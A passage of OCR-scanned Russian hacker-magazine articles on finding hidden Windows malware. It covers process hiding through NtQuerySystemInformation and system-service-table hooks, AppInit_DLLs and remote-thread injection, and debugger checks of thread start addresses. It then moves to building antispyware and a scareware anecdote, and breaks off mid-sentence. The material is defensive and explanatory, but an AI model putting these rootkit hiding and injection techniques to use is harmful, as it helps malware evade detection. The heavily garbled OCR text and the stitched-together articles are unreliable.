БОДНОМ МЕСТЕ ВНУТРИ NTDLL.DLL), 
«ВЫЧИЩАЮЩИЙ» ИЗ ВЫДАВАЕМОЙ ЕЮ 
ИНФОРМАЦИИ ВСЯКОЕ УПОМИНАНИЕ 

О СЕБЕ. СПОСОБ ПРОСТОЙ КАК БАРА- 
БАН, НО ГРЯЗНЫЙ И ЛЕГКО ОБНАРУЖИ- 
ВАЕМЫЙ ПУТЕМ ДИЗАССЕМБЛИРОВА- 
НИЯ NTDLL.DLL ИЛИ СРАВНЕНИЕМ EE 

С ОРИГИНАЛОМ. ТАК ЖЕ МАЛВАРИ ПРИ- 
ДЕТСЯ ПРОТИВОСТОЯТЬ $ЕС И УСТА- 
НОВКЕ SERVICEPACK'OB, НЕКОТОРЫЕ 
ИЗ КОТОРЫХ ОБНОВЛЯЮТ NTDLL.DLL. 


2 МОДИФИЦИРОВАТЬ NTDLL.DLLINTQUE- 
RYSYSTEMINFORMATION В ПАМЯТИ. ПО- 
СКОЛЬКУ МТ ПОДДЕРЖИВАЕТ МЕХА- 
НИЗМ COPY-ON-WRITE, АВТОМАТИЧЕСКИ 
«РАСЩЕПЛЯЮЩИЙ» СТРАНИЦЫ ПАМЯТИ 
ПРИ ЗАПИСИ, МОДИФИКАЦИЯ NTDLL.DLL 
ПРИОБРЕТАЕТ ЛОКАЛЬНЫЙ ХАРАКТЕР, 
ОГРАНИЧЕННЫЙ КОНТЕКСТОМ ПРОЦЕС- 
СА-ПИСАТЕЛЯ. ТО ЕСТЬ, ЧТОБЫ ВОЗДЕЙ- 
СТВОВАТЬ НА «ДИСПЕТЧЕР ЗАДАЧ», В НЕ- 
ГО ПРЕЖДЕ НЕОБХОДИМО ВНЕДРИТЬСЯ. 
ВОТ ОДИН ИЗ ВОЗМОЖНЫХ СЦЕНА- 
РИЕВ. МАЛВАРЬ СОЗДАЕТ СВОЮ DLL 
И ПРОПИСЫВАЕТ ЕЕ В СЛЕДУЮЩУЮ 
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ВЕТКУ СИСТЕМНОГО РЕЕСТРА: 
HKLM\SOFTWARE\MICROSOFT\WINDOWS 
NT\CURRENTVERSION\WINDOWSI\APPI- 
NIT_DLLS. В РЕЗУЛЬТАТЕ ЧЕГО ЭТА DLL 
ПОСЛЕ БУДЕТ ОТОБРАЖАТЬСЯ НА ВСЕ 
ПРОЦЕССЫ. ДЛЯ БОЛЬШЕЙ СКРЫТНО- 
СТИ МОЖНО МОДИФИЦИРОВАТЬ 
NTDLL.DLL ТОЛЬКО В КОНТЕКСТЕ TEX 
ПРОЦЕССОВ, КОТОРЫЕ ИСПОЛЬЗУЮТСЯ 
ДЛЯ ВЫВОДА СПИСКА ЗАДАЧ (ТАЗКМ- 
NG.EXE, FAR.EXE, TLIST.EXE ИТ. Д.). 

В ЭТОМ СЛУЧАЕ, ЗАГЛЯНУВ ОТЛАДЧИ- 
КОМ ВНУТРЬ NTQUERYSYSTEMINFORMA- 
ТОМ, МЫ НЕ НАЙДЕМ НИКАКИХ СЛЕДОВ 
МАЛВАРИ. МОЖНО, КОНЕЧНО, ПРОВЕ- 
РИТЬ APPINIT_DLLS, HO ЭТО HE ЕДИН- 
СТВЕННЫЙ СПОСОБ ВНЕДРЕНИЯ, ТАК 
ЧТО ЗАДАЧА ВЫЯВЛЕНИЯ МАЛВАРИ РЕЗ- 
КО УСЛОЖНЯЕТСЯ. 


з МОДИФИЦИРОВАТЬ ТАБЛИЦУ ИМПОР- 
ТА TASKMNG.EXE («ДИСПЕТЧЕР ЗАДАЧ»), 
PROCLIST.DLL (ПЛАГИН FAR'A, ОТВЕТ- 
СТВЕННЫЙ ЗА ВЫВОД СПИСКА ПРОЦЕС- 
COB), TLIST.EXE НА ДИСКЕ (ИЛИ В ПАМЯ- 
ТИ), ПОДМЕНИВ ВЫЗОВОВ NTQUERYSY- 
STEMINFORMATION СВОЕЙ СОБСТВЕН- 
НОЙ ФУНКЦИЙ ОБЕРТКОЙ. ТАКОЙ ПЕ- 
РЕХВАТ ЛЕГКО ОБНАРУЖИВАЕТСЯ ПУ- 
ТЕМ СРАВНЕНИЯ ИСПОЛНЯЕМЫХ ФАЙ- 
ЛОВ С ИХ ОБРАЗОМ ПАМЯТИ, КОТОРЫЙ 
МОЖЕТ БЫТЬ ПОЛУЧЕН ПУТЕМ CHATUA 
ДАМПА УТИЛИТОЙ ТИПА PE TOOLS ИЛИ 
СТАРЫМ ДОБРЫМ PROCDUMP'OM. К TO- 
МУ ЖЕ МАЛВАРИ ПРИДЕТСЯ ДОПОЛНИ- 
ТЕЛЬНО ПЕРЕХВАТЫВАТЬ GETPROCAD- 
DRESS, ЧТОБЫ ОТСЛЕЖИВАТЬ ДИНАМИ- 
ЧЕСКУЮ ЗАГРУЗКУ NTDLL.DLL. 


При наличии прав администратора, малварь мо- 
жет проникнуть в NTOSKRNL.EXE и подменить 
сервис 97h своим собственным обработчиком. Тог- 
да с прикладного уровня обнаружить зловредный 
процесс уже не удастся и придется спускаться на 
уровень ядра (подробно рассмотрено в разделе 
«восстановление SST»). 

А вот ЗоН-!се не использует NtQuerySyste- 
minformation и для отображения списка процессов 
самостоятельно разбирает базовые структуры 
операционной системы, а потому легко выявляет 
скрытые процессы. 

Теоретически, малварь может внедриться в 
soft-ice и перехватить любую из его команд (на- 
пример, команду «PROC»), действуя по той же 
схеме, что и IceExt/IceDump (благо, что обе утили- 
ты распространяются в исходных текстах). Но в 
живой природе такие «монстры» пока что не 
встречались. Можно надеяться, что IceExt, скры- 
вающий soft-ice от большинства защит, скроет его 
и от малвари, однако, при этом остается угроза 
сигнатурного поиска отладчика в памяти. К тому 
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с во втором двойном слове (6) 


2FFEO FFFFFFFF End of SEH chain 

2FFE4 79481F54 SE handler 

2FFE8 79432B18 KERNEL32.79432B18 

2FFEC 00000000 

2FFFO 00000000 

2FFF4 00000000 

2FFF8 00401405 va_threa.<ModuleEntryPoint>; стартовый адрес потока 578h 


2FFFC 00000000 ; дно пользовательского стека потока 


systemInformation в действительности представляет собой (7) 


«переходник» к C 
„.Сехе:77Е95ВВО 
„.Сехе:77Е95ВВО 


емному се 
public ZwQuerySystemInformation 
ZwQuerySystemInformation proc near 


. text: 77F95BBD arg_0 = byte ptr 4 

.text:77F95BBD 

.text:77F95BBD В8 97 00 00 00 mov eax, 97h ; NtQuerySystemInformation 
.text:77F95BC2 8D 54 24 0 lea edx, [esptarg_0] 

.text:77F95BC6 CD 2E int 2Eh 

.text:77F95BC8 C2 10 00 retn 10h 

ZwQuerySystemInformation endp 


. text: 77F95BC8 


протокол работы с soft-ice, демонстрирующий получение адреса (3) 
системного сервиса 97Н 

:dd 

:d KeServiceDescriptorTable 

0008:8046AB80 804704D8 00000000 000000Е8 804708BC ..G........... G. 

:d 804704D8 

0008:804704D8 804АВЗВЕ 804AE86B 804BDEF3 80508034 ..J.k.d...K.4.P. 

0008:804704E8 804C11F4 80459214 8050C2FF 8050C33F ..L...E...P.?.P. 

0008:804704F8 804B581C 80508874 8049860A 804FC7E2 .XK.t.P Tis jo О 


:u *(804704D8 + 97*4) 
ntoskrnl!NtQuerySystemInformation 
0023: 804BF933 PUSH EBP 
0023:804BF934 MOV EBP, ESP 


0023: 804BF936 PUSH FF 
804043A0 
ntoskrnl!_except_handler3 


0023: 804BF938 PUSH 
0023:804BF93D PUSH 


копия таблицы системных вызовов, хранящаяся внутри NTC RNL . EXE (9) 
.data:004704D8 ВЕ B3 4A 00 _KiServiceTable dd offset _NtAcceptConnect Port@24 
.data:004704DC 6B ЕЁ 4A 00 dd offset _NtAccessCheck@32 

dd offset _NtAccessCheckAndAuditAlarm@44 


.data:004704E0 F3 DE 4B 00 


чеинициализированная 5ПТ-таблица, хранящаяся в № ‹ВМЬ.ЕХЕ (10) 
.data:0046AB80 ; Exported entry 516. KeServiceDescriptorTable 

.data:0046AB80 public _KeServiceDescriptorTable 

.data:0046AB80 _KeServiceDescriptorTable dd 0 


просмотр ID! 
+I DT 
Int Type 


(11) 


Sel:Offset 

ТОТЬазе=80036400 Limit=07FF 
0000 IntG32 0008:804625E6 DPL=0 
0001 IntG32 0008:80462736 DPL=3 
0002 IntG32 0008:0000144Е DPL=0 
0003 IntG32 0008:80462А0Е DPL=3 


Attributes Symbol/Owner 


ntoskrn1!Kei386EoiHelper+0590 
ntoskrn1!Kei386EoiHelper+06E0 


ююз 


ntoskrnl!Kei386EoiHelper+09B8 


же на хакерских форумах не первый год обсужда- 
ется гипотетический алгоритм скрытия, перехва- 
тывающий функции переключения контекста и 
«вытирающий» себя в промежутках между ними. 
Но реализация такого проекта упирается в непре- 
одолимые практические трудности. Формат про- 
цессорных структур непостоянен и меняется от од- 
ной версии системы к другой, к тому же с ними 
взаимодействует множество недокументирован- 
ных функций, вызываемых в разное время из раз- 
личных мест. И малварь, пытающаяся замаскиро- 
ваться, постоянно обрушивает систему в BSOD, 
чем сразу себя и разоблачает... 

Будем считать, что связки «зоН-се + IceEXt» 
для просмотра всех процессов (включая скрытые) 
вполне достаточно. 
> допрос потоков. В последнее время все чаще 
и чаще малварь не создает для себя отдельный 
процесс (который очень легко заметить), а пред- 
почитает внедряться в один из уже существую- 
щих. Для этого используются два механизма. В 
первом малварь выделяет в целевом процессе 
блок памяти функцией VirtualAllocEx, копирует се- 
бя через WriteProcessMemory и создает удален- 
ный поток посредством CreateRemoteThread. Вто- 
рой механизм начинается так же, как и первый, 
только вместо создания удаленного потока мал- 
варь останавливает текущий поток процесса и из- 
меняет регистр ЕР функцией SetThreadContext 
(естественно, предварительно сохранив его ори- 
гинальное значение через GetThreadContext), пе- 
редавая управление своей собственной процеду- 
ре, вызывающей CreateThread, восстанавливаю- 
щей ЕР и «размораживающей» ранее остано- 
вленный поток. Первый механизм работает толь- 
ко на МТ, второй — на всех 32-разядных системах 
семейства Windows. 

Как обнаружить такой метод вторжения? 
Естественно, количество потоков атакуемого про- 
цесса увеличивается на единицу, однако, это еще 
не показатель. Никто и никогда не может сказать 
точно, сколько у приложения должно быть пото- 
ков. Даже его непосредственный разработчик! 
Проведем простой эксперимент. Запусти «Блок- 
нот» и, переключившись на «Диспетчер Задач», 
увидишь один единственный поток. Теперь зайди 
в меню «файл» и скажи «открыть». Количество 
потоков внезапно подскакивает аж до пяти! Зак- 
рывай окно открытия файла — один поток исчеза- 
ет, остается четыре. Что за ерунда такая?! Оказы- 
вается, все дело в динамических библиотеках 
SHLWAPI.DLL, RPCRT4.DLL и OLE32.DLL, «обслу- 
живающих» окно и порождающих свои собствен- 
ные, дочерние потоки. Некоторые драйвера так 
же могут порождать потоки в чужих приложениях 
(как правило, с целью вызова прикладных API). И 
тебе необходимо как-то научиться отличать «ле- 
гальные» потоки от «нелегальных», иначе борьба 
с малварью обречена на провал. 

Идея проста, как 3-х дюймовая дискета. 
Стартовый адрес легального потока лежит в пре- 


делах страничного имиджа (в секции .code и .text), 
а нелегального — в куче, то есть в области динами- 
ческой памяти, выделенной функцией VirtualAllo- 
cEx. Чтобы разоблачить нелегалов, прежде всего 
понадобится карта адресного пространства. Soft- 
ice отображает ее не в самом наглядном виде, и 
лучше воспользоваться OllyDbg или PE-TOOLS. 

В OllyDbg в меню «Не» выбираешь «attach» и 
указываешь процесс, чьи потоки будешь исследо- 
вать. После успешного присоединения к процессу 
говоришь «view» > «memory» или давишь <ALT-M>. 
Получаешь карту. 

Регионы, помеченные как «Priv» (сокраще- 
ние от «private»), принадлежат блокам динамиче- 
ской памяти, «тар» (сокращение от «тарртд») — 
проекциям файлов, созданных функциями Create- 
FileMapping/MapViewOfFile, «lmag» (сокращение 
ОТ «imaging») — страничным имиджам исполняе- 
мых файлов или динамических библиотек. 

В PE-TOOLS для той же цели необходимо 
выделить процесс и в контекстном меню выбрать 
«dump region», при этом на экране появится диа- 
логовое окно с картой памяти — не так подробно 
как у OllyDbg, но для нашей задачи вполне удовле- 
творительно. 

Для дальнейших экспериментов понадобит- 
ся программа, создающая пару потоков — «чест- 
ным» И «нечестным» путем. 


исходный код демонстрационной программы 
(с опущенной обработкой ошибок и других исклю- 
чительных ситуаций), полная версия — на диске 


Компилируешь с настройками по умолчанию, запу- 
скаешь, заходишь в SOft-ice, даешь команду «ТНВЕ- 
AD -х» (вывод детальной информации о потоках) 
смотришь полученный результат (смотри листинг1). 

Soft-ice не смог определить истинные стар- 
товые адреса потоков, заблудившись в недрах 
КЕАВМЕЕЗ2.О01.. Что >, попробуем другой инстру- 
мент — Process Explorer от Марка Руссиновича, 
весьма неплохо разбирающегося во внутренно- 
стях операционных систем от Microsoft (и даже 
участвующего в написании книги «Windows NT In- 
ternals»). Скачиваешь (совершенно бесплатно) 
Process Explorer, запускаешь, наводишь курсор Ha 
«va_thread.exe» (или как назвал демонстрацион- 
ную программу), далее в контекстном меню выби- 
раешь пункт «Properties» и в открывшемся диало- 
говом окне переходишь к вкладке «Threads». 

Что видим? Адреса двух потоков определе- 
ны верно. Первый: va_thread.exe+0x1405, судя по 
адресу, представляет основной поток (адрес сов- 
падает с точкой входа, что легко проверить в hi- 
ew'e). Второй: va_thread.exe+0x1000 — это «чест- 
но» созданный поток (что, опять-таки, проверяет- 
ся по адресу в hiew'e), а вот третий — КЕВ- 
NEL32.DLL+0xB700 — это «нечестный» поток (а 
чем OH еще может быть), только его стартовый ад- 
рес определен неправильно! 

Призываем на помощь OllyDbg и пытаемся 
разобраться в ситуации самостоятельно, без всех 
этих прелестей автоматизации и прочих чудес тех- 
нического прогресса. Подключившись к процессу 
va_thread.exe, в меню «view» выбираешь пункт 
«thread» и... обнаруживаешь не три (как ожида- 
лось), а целых четыре потока (смотри листинг 2)! 

Стартовый адрес (entry) определен только для 
одного из потоков — 50Ch, да и тот, вероятно, слу- 
жит для связки отлаживаемого процесса с OllyDbg. 
Стартовые адреса остальных потоков выставлены в 
ноль, но ведь это же не так... Щелкаешь мышью по 
потоку с идентификатором 5581 (естественно, при 
следующем запуске программы идентификаторы 
потоков будут другими) и получаешь код, который 
(судя по карте памяти) принадлежит страничному 
имиджу, следовательно, это — легальный поток. 
(смотри листинг 3). 

Переходи к окну стека, перемещая ползунок 
в самый низ. На дне стека увидишь аргумент, пере- 
данный потоку (второе двойное слово, в данном 
случае равное 999h), и стартовый адрес потока 
(лежащий в третьем двойном слове и в данном 
случае равный 4010001), что верно (на самом де- 
ле, в зависимости от способа создания потока, 
стартовый адрес может лежать как в третьем, так 
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и во втором слове, поэтому автоматические утили- 
ты и путаются). 

Переходи к следующему потоку — 55Ch. Код 
выглядит так же, как раньше (ведь запустили два эк- 
земпляра одной и той же функции), а вот содержи- 
мое дна стека слегка изменилось (смотри листинг 4). 

666h — это аргументы, переданные «нечест- 
ной» копии потока, а 5200001 — его стартовый ад- 
рес, принадлежащий (если верить карте памяти) 
блоку памяти, выделенному функцией VirtualAlloc 
(смотри листинг 5). 

Последний поток — 578h, представляет со- 
бой основной поток программы и хранит свой стар- 
товый адрес не в третьем, а во втором (!) двойном 
слове (смотри листинг 6). 

Итак, мы научились быстро и просто опреде- 
лять стартовые адреса потоков, четко отличая 
«левых» от «правых». Кстати, чтобы каждый раз 
не сверяться с картой памяти, можно использо- 
вать следующий трюк. Если при нажатии старто- 
вого адреса в контекстном меню OllyDbg присут- 
ствует строчка «Follow in Disassembler» — он при- 
надлежит страничному имиджу (то есть легально- 
му потоку) и, соответственно, наоборот. 

На самом деле, праздновать победу еще ра- 
но. Умная малварь может нас легко обмануть. Сам- 
ое простое — подменить истинный стартовый ад- 
рес так, чтобы он указывал внутрь страничного 
имиджа целевого процесса (но в этом случае он 
должен совпадать с началом какой-нибудь проце- 
дуры, иначе мы тут же разоблачим обман). Более 
умная малварь использует хитрый способ внедре- 
ния — находит в целевом процессе функцию по 
стандартному прологу PUSH EBP/MOV EBP, ESP 
(55h/8Bh ECh), вставляет в ее начало jump Ha выде- 
ленный из кучи блок, где размещено ее тело, соз- 
дает новый поток, начинающийся с jump, и тут же 
восстанавливает оригинальное содержимое хакну- 
той функции, убирая jump и возвращая стандарт- 
ный пролог. Еще остается вариант загрузки внутрь 
процесса динамической библиотеки, принадлежа- 
щей малвари, и запуск внутри нее нового потока. 

Во всех этих случаях анализ стартового ад- 
реса не даст никакого результата, и внедрение 
зловредного кода останется незамеченным. Что- 
бы быть уверенным на все 100%, необходимо 
трассировать каждый из потоков на предмет про- 
верки его лояльности. Потоки, порожденные мал- 
варью, либо шпионят за клавиатурой, либо откры- 
вают backdoor, либо рассылают спам. Проблема в 
том, что потоков (легальных) очень много, а со- 
временная малварь пишется уже не на ассембле- 
ре, а черт знает на чем (DELPHI, Visual BASIC). 
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ОБЕСПЕЧЕНИЕ — ВИРУСЫ, ЧЕРВИ, ШПИОНЫ И ПРОЧИЕ 
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ДЛЯ СОКРЫТИЯ СВОЕГО ПРИСУТСТВИЯ В СИСТЕМЕ МАЛВАРЬ 
ВНЕДРЯЕТСЯ В ЕЕ ЯДРО И ПЕРЕХВАТЫВАЕТ ОДИН ИЛИ 


НЕСКОЛЬКО СЕРВИСОВ 


И полный анализ потребует уйму времени, одна- 
ко, как говорилось выше, умная малварь — боль- 
шая редкость, и подделкой стартовых адресов по- 
токов никто не занимается. 

> — восстановление SST. Для сокрытия своего 
присутствия в системе малварь нередко внедря- 
ется в ее ядро и перехватывает один или несколь- 
ко сервисов, например, функцию NtQuerySyste- 
minformation. 

Дизассемблирование NTDDLL.DLL показывает, 
что большинство низкоуровневых функций реализо- 
ваны как «переходники» к функциям ядра, интерфейс 
с которым осуществляется либо посредством преры- 
вания INT 2Eh (МТ, \/2К), либо машинной командой 
SYSENTER (ХР ивыше) (смотри листинг 7). 

Когда происходит вызов прерывания, про- 
цессор автоматически переключается с приклад- 
ного уровня (ring 3) в режим ядра (ring 0), переда- 
вая управление функции KiSystemService, реали- 
зованной внутри NTOSKRNL.EXE и опирающейся 
на Таблицу Системных Дескрипторов (она же SDT — 
System Descriptor Table). Собственно дескрипто- 
ров в ней всего два — один для системных вызо- 
вов, другой — для драйвера win32k.sys, куда упря- 
тали весь графический интерфейс. На серверах 
добавляется и третий дескриптор — IIS, назначе- 
ние которого ясно из названия. 

Дескриптор, отвечающий за системные вы- 
зовы, указывает Ha System Service Table (Таблицу 
Системных Вызовов), представляющую собой 
простой массив указателей на функции, которые 
очень легко изменить (естественно, делать это 
нужно либо из режима ядра, либо с прикладного 
уровня, обратившись к псевдоустройству Physical- 
Метогу). Найти таблицу системных вызовов в па- 
мяти очень просто. «Скармливаешь» NTOSKRNL.EXE 


Результат работы SDT Restore 
на зараженной машине 


функции LoadLibrary и, используя возвращенный 
ей дескриптор, определяешь адрес экспортируе- 
мой переменной KeServiceDescriptorTable через 
GetProcAddress (или разбираешь таблицу эк- 
спорта вручную). Первое же двойное слово со- 
держит указатель на SST, поэтому эффективный 
адрес требуемого системного сервиса по его 
«магическому» номеру определяется так: addr == 
*(DWORD *)(KeServiceDescriptorTable[0] + N*siz- 
eof(DWORD)). Где N — номер сервиса, a addr — 
его эффективный адрес (смотри листинг 8). 

Чтобы просмотреть содержимое SST в soft- 
ice, достаточно дать команду «NTCALL». Ha «сте- 
рильной» машине все вызовы указывают внутрь 
NTOSKRNL.EXE, а если это He так, то их кто-то пе- 
рехватил. Это может быть как зловредная малварь, 
так и вполне безобидный драйвер какого-нибудь 
защитного механизма или, например, брандмауэр. 

Для восстановления SST можно использовать 
копию, хранящуюся внутри NTOSKRNL.EXE, пра- 
вда, найти ее на диске значительно сложнее, чем в 
памяти. Проще всего использовать отладочные 
символы, которые можно бесплатно загрузить с 
сервера http://msdl.microsoft.com/download/symbols с no- 
мощью библиотеки dbghelp.dll, входящей в состав 
бесплатного пакета Debugging Tools. Адресу SST co- 
ответствует метка _KiServiceTable (смотри листинг 9). 

А если отладочных символов нет? Тогда нахо- 
дишь все перекрестные ссылки к KeServiceDescrip- 
torTable (то есть просто ищешь ее адрес, записан- 
ный с учетом обратного порядка байт на х86, задом 
наперед). Одна из них ведет к инструкции типа «mov 
[mem], imm32» и представляет собой смещение ори- 
гинальной SST (imm32), записываемой в KeService- 
DescriptorTable[0]. С помощью дизассемблера не- 
трудно убедиться, что изначально SDT пуста и ини- 
циализируется на стадии загрузки ядра неэкспорти- 
руемой функцией KilnitSystem (смотри листинг 10). 

Если лень восстанавливать SST вручную, 
можно воспользоваться бесплатной утилитой 
«Win2K/XP SDT Restore» от Tan Chew Keong. 

Пользуясь SDT Restore, следует иметь вви- 
ду, что уже появились rootkit'bl, способные ее об- 
ходить. Во-первых, для поиска оригинальной SST 
утилита SDT Restore использует простой, HO нена- 
дежный способ, обращаясь к KeServiceDescriptor- 
Table[0], которую зловредная малварь может и 
подменить (смотри hitp://hi-tech.nsys.by/35/). Во-вто- 
рых, само восстановление SST происходит с при- 
кладного уровня через псевдоустройство Physical- 
Memory, отображаемое в память посредством па- 
tive-API функции NtMapViewOfSection, легко пе- 


рехватываемой как с прикладного, так и с ядрено- 
го уровней. После чего перехватчику остается 
проверить, не вызывается ли NtMapViewOfSection 
с дескриптором PhysicalMemory. И если да, то ли- 
бо заблокировать доступ, либо имитировать вос- 
становление, не производя его в действительно- 
сти (смотри www.rootkit.com/newsread.php?newsid=200). 
Так же следует учитывать, что некоторые за- 
ЩИТЫ «вешаются» на векторы прерываний, описан- 
ные в таблице IDT, и проверяют перехваченные сер- 
висы, например, каждый тик таймера. В правильной 
ОТ (просмотреть которую можно одноименной ко- 
мандой в soft-ice) все векторы указывают внутрь 
NTOSKRNL.EXE или HAL.DLL (смотри листинг 11). 
В дополнение к этому, малварь может устана- 
вливать в начало (или даже середину!) некоторых 
ядерных функций jump свой обработчик, контроли- 
рующий целостность перехваченной SST/IDT. Для 
выявления такого способа перехвата необходимо 
сравнить образ ядра с файлом NTOSKRNL.EXE, 
что можно осуществить при помощи утилиты РЕ- 
TOOLS с плагином eXtreme Dumper или сдампить 
ядро непосредственно из самого зоН-се (что нам- 
ного надежнее) с установленными расширениями 
IceExt или [себитр. 
> — востатке. Два основных пути проникновения 
малвари на компьютер — файлы, запускаемые 
самим пользователем, и дырявое программное 
обеспечение (последнее преимущественно отно 
сится к IE и линейке МТ). И если первое еще мож- 
но как-то предотвратить — не открывать потен- 
циально опасных вложений, полученных по почте, 
пользоваться приложениями только от проверен- 
ных поставщиков, не скачивать сгаск'и, написан- 
ные непонятно кем и неизвестно для чего, то от 
дыр никуда не уйти. Даже если пересесть с IE на 
Lynx, останутся дефекты оси, коих в МТ просто до 
фига, и к которым постоянно добавляются новые, 
ранее неизвестные. То есть это нам они неизвест- 
ные, а кому-то очень даже хорошо известные и эк- 
сплуатируемые. Никто не может чувствовать себя 
в безопасности, если не будет регулярно прове- 
рять все закоулки системы руками и, конечно, мо- 
гучим soft-ice со всей его свитой © 
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Spyware и adware — главные враги современного 
пользователя Сети. Информация о том, на каких 
сайтах отвисает среднестатистический интернет- 
чик той или иной страны, очень дорого стоит. Еще 
больше ценится возможность хоть на несколько 
секунд «впарить» юзеру рекламный ролик своего 
товара. За это готовы хорошо платить как огром- 
ные корпорации, так и маленькие фирмочки с 
большими амбициями. 

Но многим людям не нравится, что за ними 
шпионят и постоянно промывают мозги рекламой. 
И, следуя основному закону экономики «спрос 
рождает предложение», появились средства, про- 
тиводействующие назойливым программкам. Их 
скромно называют antispyware. 

В этой статье я расскажу, как создать свой 
собственный антизру\маге, да еще таким образом, 
чтобы он стал коммерчески успешным проектом. 
Здесь, конечно, не будет исходных кодов, и чело- 
век, ни разу не видевший С++ или хотя бы Веры, 
не сможет после прочтения этого материала сесть 
и написать свою программу для уничтожения 
spyware. Но зато осилившие статью, поймут, что 
все не так сложно как кажется, и будут четко пред- 


в целях 
самозащиты... 
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ставлять себе, что надо сделать, чтобы их продукт 
продавался. 
> сердце антизрумаге. Давай подумаем, без 
чего наш AHTUSpyware не сможет обойтись. Ну, ко- 
нечно же, без сканера! Его надо реализовать в 
первую очередь. Причем сканер должен быть уни- 
версальным, то есть ему должно быть абсолютно 
все равно, что и где искать. Естественно, без ООП 
(объектно-ориентированного программирования) 
здесь будет очень тяжело обойтись. Лично я реко- 
мендую разработать сначала абстрактный роди- 
тельский класс сканера, который будет реализо- 
вывать общие методы, такие как старт, остановка 
или приостановка сканирования, а затем создать 
потомков этого абстрактного сканера, которые бу- 
дут работать с файловой системой, реестром и т.п. 
Теперь давай немного отвлечемся от сканера 
и определимся стем, что именно нам надо искать, и 
где это прячется. В первую очередь это исполняе- 
мые файлы: exe, dil. spyware, как правило, активно 


работают с реестром. Самое простое, что может 
сделать такая шпионская программа — это доба- 
вить себя в ключик реестра Вип. Но чаще использу- 
ются более изощренные способы запуска, напри- 
мер подгрузка dill к процессу explorer.exe. Многие 
spyware и adware — вполне самостоятельные про- 
граммы и могут быть даже СОМ-компонентами. А, 
как известно, СОМ-объекты регистрируются в ре- 
естре и однозначно идентифицируются при помо- 
щи GUID. A GUID (Globally Unique Identifier) — это 
шестнадцатибайтный двоичный массив, обеспечи- 
вающий идентификаторы, которые не повторяются 
нигде и никогда. Эти GUID’bI хранятся в ключе pee- 
стра HKCR\AppID. Благодаря их уникальности мож- 
но без труда найти и обезвредить шпиона. 

Обычно Spyware скрываются во вполне опре- 
деленных директориях и часто — в системных (это 
не вирус, который может забраться в любой уголок 
жесткого диска). Они могут менять стартовую 
страницу браузера, а могут использовать ВНО 


(Browser Helper Object (читай о них в номере)). Все 
эти моменты надо учитывать и знать, как именно 
найти и устранить тот или иной тип Spyware. 

Ну а теперь вернемся к нашему сканеру, 
точнее сканерам. Мы уже приблизительно знаем, 
что и где искать, и, следовательно, теперь можно 
писать конкретный сканер файловой системы, 
реестра и т.д. Как я уже говорил, для комфортной 
работы пользователя, наш AHTUSpyware должен 
уметь останавливать процесс сканирования. От- 
сюда следует, что этот процесс должен идти в от- 
дельном потоке. Нужно продумать, какую инфор- 
мацию о найденном объекте передавать в пользо- 
вательский интерфейс и как это делать. Так же 
следует продумать механизм уничтожения зара- 
зы, например, когда Spyware уже загружен в па- 
мять, и его нельзя просто так удалить. Так каку 
нас будет несколько сканеров, работающих с 
разными объектами, то неплохо было бы напи- 
сать менеджера сканирования, который будет 
всеми ими управлять. 

Да и вообще, чем лучше будет продуманна 
архитектура приложения, тем впоследствии лег- 
че будет его модифицировать. Не надо бояться 
писать много кода, надо бояться переписывать 
этот код. Гибкое в расширении функционально- 
сти приложение всегда имеет больший успех, 


чем его «закостенелые» аналоги: яркий тому 
пример — всем известный 1с4-клиент Miranda co 
своими плагинами. 

> база сигнатур. На самом gene, написание 
сканера — не такая уж и сложная задача. Любой 
более или менее толковый программист запросто 
справится с таким заданием. Конечно, те, у кого 
нет опыта в написании серьезного программного 
обеспечения, будут несколько раз переписывать 
свое творение, т.к. действительно качественный 
продукт можно сделать, лишь написав пару нека- 
чественных. Гораздо труднее, кажется, создать 
базу spyware... 

Для начала хочу всех обрадовать: база для 
антизру\маге сильно отличается от баз для антиви- 
русов. В последних для детектирования вредонос- 
ных программ используются синтаксические сиг- 
натуры. То есть сигнатуры, взятые непосредствен- 
но из тела вируса, например, какая-либо фраза 
или совокупность имен используемых системных 
функций. Также существуют сигнатуры, основан- 
ные на поведении или аномалиях — например, 
слишком агрессивное обращение к какому-либо 
сетевому порту на компьютере. При детектирова- 
нии Spyware используются совсем другие опозна- 
вательные признаки, которые зачастую гораздо 
легче выявить. Это, как я уже говорил, полные 
имена исполняемых файлов или характерные за- 
писи в реестре системы. Таким образом, для до- 
бавления новой шпионской программы в базу в 
большинстве случаев достаточно определить ди- 
ректорию, куда устанавливается spyware, и имя 
файла. Если шпион достаточно хитрый и не имеет 
«постоянного места жительства», то нужно поис- 
кать его следы в реестре. 

Теперь понятно, что для поддержки этой ба- 
зы понадобятся несколько человек, которые будут 
постоянно следить за происходящим в мире 
зру\маге и добавлять все новинки компьютерной 
шпионской индустрии в базу. Но сразу же возни- 
кает вопрос: «А как же начать? ». Действительно, 
ведь уже сейчас во всемирной паутине бродят ты- 
сячи spyware, и нужно, чтобы новый продукт знал 
их все. Но добавление каждого шпионского моду- 
ля — очень трудоемкая и нудная работа... И тутя 
начинаю открывать секреты. 

Итак, внимание, секрет №1: базу можно «по- 
заимствовать» у будущих конкурентов. Естествен- 
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Microsoft тоже выпустила свой aHTMSpyware 


$150К за очистку кэша 


ИГРАЯ НА ЧЕЛОВЕЧЕСКИХ СЛАБОСТЯХ 
МОЖНО ЗАРАБОТАТЬ БОЛЬШИЕ ДЕНЬГИ. 
ПРОГРАММА, КОТОРАЯ ПРОСТО ЧИСТИ- 
ЛА КЭШИЕ, ПРИНОСИЛА ПО 150000$ ДО- 
ХОДА В МЕСЯЦ. АВТОРЫ ПРИДУМАЛИ ГЕ- 
НИАЛЬНЫЙ ХОД, КОТОРЫЙ ЗАСЛУЖИВА- 
ЕТ ВНИМАНИЯ. 


НАЧНУ С ТОГО, ЧТО ПО РАСКРУЧИВА- 
ЛОСЬ НА ПОРНУШНОМ ТРАФИКЕ, И СКА- 
ЧИВАЛ ЕГО СООТВЕТСТВУЮЩИЙ КОН- 
ТИНГЕНТ. ПОСЛЕ ИНСТАЛЛЯЦИИ В УГОЛ- 
КЕ МОНИТОРА ПОЯВЛЯЛОСЬ МАЛЕНЬ- 
КОЕ ОКОШЕЧКО СО СЛАЙД-ШОУ. ЧТО 
ОНО ПОКАЗЫВАЛО, ДУМАЮ, ВСЕ УЖЕ 
ПОНЯЛИ. ДАННОЕ СЛАЙД-ШОУ СОПРО- 
ВОЖДАЛОСЬ НАДПИСЬЮ, ГЛАСИВШЕЙ, 
ЧТО ЭТО МОГУТ УВИДЕТЬ РОДИТЕЛИ, 
ЖЕНЫ И ДЕТИ ПОСЕТИТЕЛЕЙ, НО ЕСЛИ 
